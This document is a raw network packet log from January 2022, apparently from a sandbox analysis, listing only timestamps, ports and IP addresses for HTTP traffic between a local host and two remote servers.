Jan 14, 2022 00:16:14.932867050 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.932883024 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.932890892 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.932919979 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.932938099 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.932944059 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.932967901 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.932971001 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.932990074 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.933013916 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.933026075 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.933037043 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.933073997 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.933080912 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.933098078 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.933120966 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.933130980 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.933144093 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.933166981 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.933182955 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.933232069 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.934736013 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.934766054 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.934787035 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.934807062 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.934844971 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.934864044 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.934919119 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.934948921 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.934968948 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.934990883 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935010910 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935034037 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935055017 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935059071 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.935072899 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.935077906 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935098886 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935120106 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935121059 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.935142040 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935151100 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.935163021 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935184002 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935185909 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.935215950 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935220003 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.935245037 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935267925 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935278893 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.935291052 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935308933 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935328007 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.935374022 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935386896 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.935396910 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935419083 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935440063 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935451984 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.935461044 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935499907 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935508966 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.935522079 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935544968 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935556889 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.935602903 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.935616016 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935640097 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935661077 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935689926 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.935699940 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935723066 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935750008 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.935765028 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935789108 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935811043 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935821056 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.935863972 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935872078 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.935887098 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935909986 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935931921 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.935933113 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.935980082 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.939997911 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.940845966 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.942217112 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.942250013 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.942688942 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.942773104 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.944416046 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.945745945 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.945833921 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.955024958 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.956634045 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.007312059 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007334948 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007349014 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007360935 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007375956 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007390976 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007406950 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007420063 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007436037 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007451057 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007466078 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007482052 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007496119 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007510900 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007663012 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007678986 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007694006 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007755995 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007771969 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007795095 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007810116 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007824898 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007873058 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007886887 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007903099 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007919073 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007934093 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007949114 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.007996082 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.008011103 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.009366989 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.009382963 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010186911 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010204077 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010220051 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010235071 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010251999 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010267973 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010283947 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010308981 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010324001 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010340929 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010356903 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010373116 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010437965 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010452986 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010464907 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010481119 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010498047 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010513067 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010587931 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010605097 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010620117 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010636091 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010710001 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010725975 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010740995 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010793924 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010960102 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010973930 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010986090 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.010998964 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.011012077 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.011027098 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.011061907 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.011076927 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.011089087 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.011100054 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.011111021 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.011197090 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.011212111 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.011226892 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.011240959 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.011545897 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.011739969 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.011796951 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.024590969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.024761915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.024885893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.024996996 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.025111914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.025221109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.025331020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.025439024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.025549889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.025659084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.025793076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.025923014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.026029110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.026130915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.026235104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.026333094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.026436090 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.026535034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.026643038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.026752949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.026859045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.026957989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.027065039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.027168989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.027272940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.027371883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.027477980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.027576923 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.027681112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.027807951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.027923107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.028026104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.028139114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.028244019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.028352976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.028459072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.028572083 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.028677940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.028801918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.028908014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.029026985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.029126883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.029231071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.029334068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.029438019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.029537916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.029643059 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.029767036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.029886007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.029983997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.030091047 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.030190945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.030293941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.030395031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.030500889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.030601978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.030706882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.030834913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.030956030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.031063080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.031172991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.031279087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.031388998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.031496048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.031605959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.031714916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.031832933 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.031940937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.032058954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.032159090 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.032263041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.032366037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.032469034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.032577991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.032685041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.032962084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.033077002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.033180952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.033282995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.033385992 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.033497095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.033593893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.033694983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.033981085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.034092903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.034204960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.034312963 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.034421921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.034533978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.034645081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.034838915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.034957886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.035077095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.035933971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.036079884 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.036194086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.036470890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.036767960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.036886930 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.036999941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.037108898 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.037220001 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.037328005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.037447929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.087013006 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087058067 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087064028 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087086916 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087104082 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087126017 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087141991 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087163925 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087184906 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087208033 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087208986 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.087229967 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087253094 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.087254047 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087266922 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.087277889 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087300062 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087318897 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.087321043 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087338924 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087346077 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.087366104 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087374926 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087399006 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087409019 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.087420940 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087441921 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087462902 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087471962 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.087495089 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.087531090 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087536097 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.087553024 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087575912 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087596893 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087598085 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.087618113 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087641001 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087651968 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.087724924 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.087730885 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087759972 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087774038 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087794065 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087815046 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087835073 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087851048 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.087856054 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087884903 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.087901115 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087903023 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.087924957 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087948084 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087970018 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087986946 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.087990999 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.087995052 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.088011980 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088033915 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088043928 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.088054895 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088076115 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.088085890 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.088121891 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.088176966 CET	80	49920	141.8.194.74	192.168.2.4
